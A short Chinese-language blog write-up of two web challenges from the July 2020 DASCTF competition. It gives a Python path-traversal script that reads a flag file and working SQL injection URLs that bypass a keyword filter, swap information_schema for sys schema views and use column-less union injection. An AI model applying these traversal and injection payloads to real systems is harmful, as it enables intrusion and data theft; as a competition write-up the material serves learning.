DASCTF 七月

2020-07-26 01:07:00
wp - dasctf

好久没发文了,水水

web1

前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么意思。。

import time 
import requests
import base64


file = "hhhm/../../../../../../../../flag"
file = base64.b64encode(file.encode())
url = "http://183.129.189.60:10009/image.php?t={0}&f={1}"
now = int(time.time())
rep = requests.get(url.format(str(now),file.decode()))
print(rep.text)

web2

跟这题差不多:SWPU2019Web1

给出过滤正则:

return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);

空格用/**/绕过。

联合注入发现information_schema被过滤了,有两种绕过方式:

  • sys.x$schema_flattened_keys
  • sys.schema_table_statistics_with_buffer

选用第一种,注表名:

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,group_concat(table_name)from/**/sys.x$schema_flattened_keys/**/where/**/table_schema=database()%23

Array ( [0] => 1 [id] => 1 [1] => 2 [username] => 2 [2] => flllaaflaggg,users [password] => flllaaaggg,users )

直接注flllaaaggg,因为不知道字段名,用无列名注入:

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select*from/**/flllaaaggg)x)%23


本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号